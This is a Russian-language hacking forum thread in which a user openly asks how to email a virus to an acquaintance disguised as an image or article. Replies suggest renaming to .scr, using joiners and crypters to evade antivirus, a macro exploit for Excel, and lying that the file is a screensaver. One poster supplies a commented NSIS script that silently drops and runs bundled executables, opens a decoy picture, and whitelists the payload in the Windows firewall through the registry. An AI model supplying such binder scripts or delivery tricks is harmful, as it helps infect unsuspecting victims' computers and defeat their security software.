Сообщений в теме: 34

[oler117]

Нужно переслать вирус (знакомому) по почте как вложение и написать что-то типа "Посмотри прикольную картинку" либо "Очень интересная статья"... Но я уверен почти на 100%, что жертва посмотрит (заметит) разширение .exe (даже если я поставлю ассоциативную стандартную иконку). Как скрыть разширение? Возможно ли поставить разширение .doc или .jpg, но что-бы файл исполнялся?

[aka PSIH]

Цитата

жертва посмотрит (заметит) разширение .exe

замени на .scr & .com

Цитата

Возможно ли поставить разширение .doc или .jpg, но что-бы файл исполнялся?

Если ты просто поставишь расширение то файл не исполнится... ;)
Хотя где-то видел джойнер который соединяет .doc и .exe файлы... ищи ;)

[oler117]

А как этот "джойнер" називается оффициально? Что-то гугл не дает ниче толкового на запрос "джойнер"...

[oler117]

Нашел Joiner2.5, но он палится и блокируется антивирусом.

[aka PSIH]

ищи у нас на форуме
_http://forum.prologic.su/index.php?showforum=57
_http://forum.prologic.su/index.php?showtopic=1052&st=50

[oler117]

Объясните чем отличаются криптеры и джойнеры

[aka PSIH]

криптор маскирует файл от антивирусов..
джойнер соединяет два файла в один...

[Pernat1y]

aka PSIH (9.9.2008, 6:03) писал:

криптор маскирует файл от вирусов..

скорее от антивирусов )
в нагрузку еще несколько осложняет исследование файла (на сколько - зависит собственно от самого криптора)

aka PSIH (9.9.2008, 6:03) писал:

джойнер соединяет два файла в один...

не обязательно 2. это самые примитивные )

[oler117]

Понятно. Будьте добры, если знаете, дайте ссылку на скачивание какого-либо джойнера, который не палится антивирусом. Все, что я скачивал - не запускалось, писало "Вы не имеете прав для просмотра данного объекта.....".

[$iD]

oler117
Джойнеры ищи по ссылкам которые тебе давал aka PSIH ;)
На счет непалящихся: В принципе, не важно палится джойнер или нет... если у тебя есть нормальный криптор ;)

-- Есть еще у нас сервис на главной странице, который называется Pr0!0gic Joiner ;)

[oler117]

"Отказано в доступе к указанному устройству, пути или файлу. Возможно, у вас нет нужных прав доступа к этому объекту" - появляется при попытке открытия любого файла, типа джойнера. Что делать, как избавиться?
Pr0!0gic Joiner не работает... Либо я не шарю как пользоваться, пробывал соеденять .exe и .jpg (пишет, что Тип файла не потдерживается) .exe и .bmp (невозможно отобразить страницу).

[Pernat1y]

клей nsis'ом. он более гибкий и удобный
nsis.sf.net, который

[oler117]

А как им пользоваться? Как соеденить 2 файла? О nsis не скажешь, что в нем присутствует FriendlyUserInterface=)

[Pernat1y]

Name "Silent installer"
OutFile "bind.exe"
Icon "Icon_1.ico"

Function .onInit
SetSilent silent
Functionend

Section
File /oname=$TEMP\file1.exe file1.exe
Exec '"$TEMP\file1.exe"'
File /oname=$TEMP\file2.exe file2.exe
Exec '"$TEMP\file2.exe"'
File /oname=$TEMP\file3.png file3.png
ExecShell "open" '"file3.png"'
;FileClose $0
AllowSkipFiles on
Sectionend

можно еще добавить в Section что-то типа

WriteRegStr HKLM "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\Standard Profile\AuthorizedApplications\List" 'file1' '$TEMP\file1.exe'

[$iD]

Цитата

Pr0!0gic Joiner не работает... Либо я не шарю как пользоваться, пробывал соеденять .exe и .jpg (пишет, что Тип файла не потдерживается) .exe и .bmp (невозможно отобразить страницу).

Он не клеит .exe с рисунками только .exe + .exe

[oler117]

Pernat1y, можете разъяснить тот код, который написали высше. Т.е. где указывать файл1, где файл2, как писать путь...

[Pernat1y]

oler117 (14.9.2008, 22:17) писал:

Pernat1y, можете разъяснить тот код, который написали высше. Т.е. где указывать файл1, где файл2, как писать путь...

потыкал коменты )
еще можеш примеры глянуть, которые лежат в папке с нсис

;название. любое
Name "Silent installer"

;название файла-инсталера, в который сбиндяться укаанные ниже файлы
OutFile "bind.exe"

;иконка файла-инсталера
Icon "Icon_1.ico"

Function .onInit
;"тихая" установка. тоесть файлы копируються без каких-либо графических диалогов
SetSilent silent
Functionend

Section

;пример добавления записи в реестр
;в данном случае добавляем файл \temp\file1.exe в исключения в виндовом фаерволе
WriteRegStr HKLM "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\Standard Profile\AuthorizedApplications\List" 'file1' '$TEMP\file1.exe'

;первый файл, который биндим. называеться file1.exe. должен лежать
;в той-же папке, что и скрипт. извлекаеться в темп (обычно C:\Windows\temp\)
File /oname=$TEMP\file1.exe file1.exe
;запускаем первый файл из темпа
;используем "Exec" для программ (.exe файлов)
;и "ExecShell" для всего остального (рисунков, музыки, видео, документов)
Exec '"$TEMP\file1.exe"'

;тоже самое с file2.exe
File /oname=$TEMP\file2.exe file2.exe
Exec '"$TEMP\file2.exe"'

;и еще картинка
File /oname=$TEMP\file3.png file3.png
ExecShell "open" '"file3.png"'

;пропускаем файлы, которые не могут быть перезаписаны
;(если не хватает доступа, или файл уже запущен)
AllowSkipFiles on
Sectionend

[oler117]

Получилось, только не то, чего я хотел...  Как сделать, что-бы исходящий файл имел расширение .jpg либо .bmp? Зачем же мне в результате exe-файл?

[$iD]

oler117
jpg - не исполняемый файл... можно сделать только с .exe и .scr

-- Сделай .scr и скажи жертве что это скринсейвер

[xazlon]

Цитата

jpg - не исполняемый файл... можно сделать только с .exe и .scr

jpg можно тоже сделоть но это 0дэй \= (хотя под sp1 сплойт лежит в пабле)..
Если у жертвы офис 03, то могу дать джойнер который клеет с росширением *.xls. (работа через макросы =\ )
Update:
Линк на сплойт:
]]>Сплойт xls]]>

[Graf_Drakula]

Хе-хе, повезет же другу))

А если по теме, то не достаточно просто поменять exe на doc

[oler117]

Икселевский сплойт блокируется антивирем (AVG) и я не могу его открыть: "Отказано в доступе к указанному устройству, пути или файлу. Возможно, у вас нет нужных прав доступа к этому объекту". То же самое касается всех остальных джойнеров, сплойтов и др.. Что делать???

[aka PSIH]

>>Что делать???

антивирус отключить...

[$iD]

Только убедись что он ни с чем не склеен, а то будет грустно

[oler117]

Цитата

Только убедись что он ни с чем не склеен

Подробней пожалуйста... С чем "склеен" и какие могут буть последствия?